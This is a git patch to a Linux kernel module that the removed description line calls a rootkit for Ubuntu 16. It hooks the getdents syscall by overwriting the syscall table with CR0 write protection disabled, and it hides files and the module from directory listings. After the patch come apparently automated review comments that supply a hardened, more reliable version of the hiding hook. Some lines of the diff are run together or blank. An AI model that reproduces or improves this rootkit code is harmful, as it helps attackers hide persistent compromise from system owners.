From 7126d0197cfbba390660d8da2d82ffc9eaa5b462 Mon Sep 17 00:00:00 2001
From: Valentin Lechner
Date: Tue, 19 Nov 2019 15:58:29 +0100
Subject: [PATCH] cleaning up
---
 8008135.c | 101 +++++++++++++++++++++++++++++++++++++++++++++---------
 1 file changed, 85 insertions(+), 16 deletions(-)
diff --git a/8008135.c b/8008135.c
index a706335..0eb6a63 100644
--- a/8008135.c
+++ b/8008135.c
@@ -1,3 +1,24 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program. If not, see .
+ */
+
+/**** Includes ***************************************************************
+*******************************************************************************/
 #include
 #include
 #include
@@ -6,58 +27,97 @@
 #include
 #include "sysgen.h"
+
+/**** Defines *****************************************************************
+*******************************************************************************/
+
 #define GETDENTS_SYSCALL_NUM 78
 #define WRITE_PROTECT_FLAG (1<<16)
+
 #define HIDE_PREFIX "8008135."
-#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX)-1)
+#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1)
+
 #define MODULE_NAME "8008135"
 #define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1)
+/**** Modinfo ****************************************************************
+*******************************************************************************/
+MODULE_LICENSE("GPLv3");
+MODULE_AUTHOR("JanKoernerEnterprises");
+MODULE_DESCRIPTION("8008135");
+MODULE_VERSION("0.1");
+/**** type *******************************************************************
+*******************************************************************************/
 struct linux_dirent {
 unsigned long d_ino;
 unsigned long d_off;
- unsigned short d_reclen; // d_reclen is the way to tell the length of this entry
- char d_name[1]; // the struct value is actually longer than this, and d_name is variable width.
+ unsigned short d_reclen; // d_reclen is the way to tell the length of this entry
+ char d_name[1]; // the struct value is actually longer than this, and d_name is variable width.
}; -MODULE_AUTHOR("JKE"); -MODULE_LICENSE("GPL v2"); -MODULE_DESCRIPTION("RootKit for Ubuntu-16"); +typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, + struct linux_dirent __user *dirent, + unsigned int count); + +/**** var ******************************************************************** +*******************************************************************************/ -typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count); sys_getdents_t sys_getdents_orig = NULL; -// our new getdents handler -asmlinkage long sys_getdents_new(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count) { +/*** FUNCTION **************************************************************** +* NAME: sys_getdents_new +* DESCRIPTION: function overriding the original getdents +* PARAMETERS: - +* RETURNS: - +*******************************************************************************/ +asmlinkage long sys_getdents_new(unsigned int fd, + struct linux_dirent __user *dirent, + unsigned int count) { int boff; struct linux_dirent* ent; + long ret = sys_getdents_orig(fd, dirent, count); + char* dbuf; + if (ret <= 0) { return ret; } + dbuf = (char*)dirent; + // go through the entries, looking for one that has our prefix for (boff = 0; boff < ret;) { + ent = (struct linux_dirent*)(dbuf + boff); - if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) // if it has the hide prefix - || (strstr(ent->d_name, MODULE_NAME) != NULL)) { // or if it has the module name anywhere in it + // if it has hide prefix or module name anywhere, hide it + if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) + || (strstr(ent->d_name, MODULE_NAME) != NULL)) { + // remove this entry by copying everything after it forward - memcpy(dbuf + boff, dbuf + boff + ent->d_reclen, ret - (boff + ent->d_reclen)); // and adjust the length reported + memcpy(dbuf + boff, dbuf + boff + ent->d_reclen, + ret - (boff + ent->d_reclen)); ret -= 
ent->d_reclen;
 } else { // on to the next entry
 boff += ent->d_reclen;
 }
 }
+
 return ret;
 }
-static int __init lkm_example_init(void) {
+/*** FUNCTION ****************************************************************
+* NAME: 8008135_init
+* DESCRIPTION: initializing Kernel Module
+* PARAMETERS: -
+* RETURNS: int
+*******************************************************************************/
+static int __init init_8008135(void) {
 printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table);
 // record the original getdents handler
@@ -78,7 +138,14 @@ static int __init lkm_example_init(void) {
 return 0;
 }
-static void __exit lkm_example_exit(void) {
+
+/*** FUNCTION ****************************************************************
+* NAME: 8008135_exit
+* DESCRIPTION: unloading Kernel Module
+* PARAMETERS: -
+* RETURNS: -
+*******************************************************************************/
+static void __exit exit_8008135(void) {
 // allow us to write to read onlu pages
 write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
 // set getdents handler back
@@ -88,5 +155,7 @@ static void __exit lkm_example_exit(void) {
 printk(KERN_INFO "Old syscall back\n");
 }
-module_init(lkm_example_init);
-module_exit(lkm_example_exit);
\ No newline at end of file
+
+// Setting pointers to init-/exit-functions
+module_init(init_8008135);
+module_exit(exit_8008135);
\ No newline at end of file
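Review bot: The entry removal in sys_getdents_new copies between overlapping ranges — `dbuf + boff` and `dbuf + boff + ent->d_reclen` overlap whenever more than one entry follows the hidden one — and memcpy on overlapping memory is undefined, so the reformatted call should become `memmove(dbuf + boff, dbuf + boff + ent->d_reclen, ret - (boff + ent->d_reclen));`. More seriously, `dbuf = (char*)dirent;` discards the `__user` qualifier and the loop then reads and rewrites userspace memory directly from kernel context, and `ent->d_reclen` is taken from that user-writable buffer without validation: a zero value spins the loop forever and a value larger than `ret - boff` makes the copy length negative (a huge size_t after conversion). I would copy the buffer into a kernel allocation, validate each `d_reclen` against `ret`, filter there and write the result back with copy_to_user, as sketched below (linux/slab.h and linux/uaccess.h are needed if not already included — the include lines are not legible in this patch). Separately, `MODULE_LICENSE("GPLv3")` replaces the previously valid `"GPL v2"` with a string the kernel's license check does not recognise, so the module loads as proprietary, taints the kernel and loses access to GPL-only exported symbols.
```c
asmlinkage long sys_getdents_new(unsigned int fd,
                                 struct linux_dirent __user *dirent,
                                 unsigned int count) {
	long ret = sys_getdents_orig(fd, dirent, count);
	long boff = 0;
	char *kbuf;

	if (ret <= 0)
		return ret;

	// filter a kernel copy; never dereference the user buffer directly
	kbuf = kmalloc(ret, GFP_KERNEL);
	if (!kbuf || copy_from_user(kbuf, dirent, ret)) {
		kfree(kbuf);
		return ret;
	}

	while (boff < ret) {
		struct linux_dirent *ent = (struct linux_dirent *)(kbuf + boff);
		unsigned short reclen = ent->d_reclen;

		// a zero or oversized d_reclen would loop forever / read past ret
		if (reclen < sizeof(*ent) || boff + reclen > ret)
			break;

		if (strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0
		    || strstr(ent->d_name, MODULE_NAME) != NULL) {
			memmove(kbuf + boff, kbuf + boff + reclen, ret - (boff + reclen));
			ret -= reclen;
		} else {
			boff += reclen;
		}
	}

	if (copy_to_user(dirent, kbuf, ret))
		ret = -EFAULT;
	kfree(kbuf);
	return ret;
}
```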
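Review bot: The new function header above exit_8008135 names the function `8008135_exit` (the init header likewise says `8008135_init`), which is not a valid C identifier and does not match the definition; the line should read `* NAME: exit_8008135`. The `PARAMETERS: -` / `RETURNS: -` lines say nothing a reader could not get from the signature, whereas a sentence on what the function undoes would help: it clears CR0.WP and then restores the original getdents entry, and nothing visible in the hunk disables preemption around that window, so the header should either state that assumption or the body should wrap the CR0 write and table store in `preempt_disable()` / `preempt_enable()` — a migration to another CPU between the two would fault on the still write-protected table. The body of exit_8008135 continues outside the hunk.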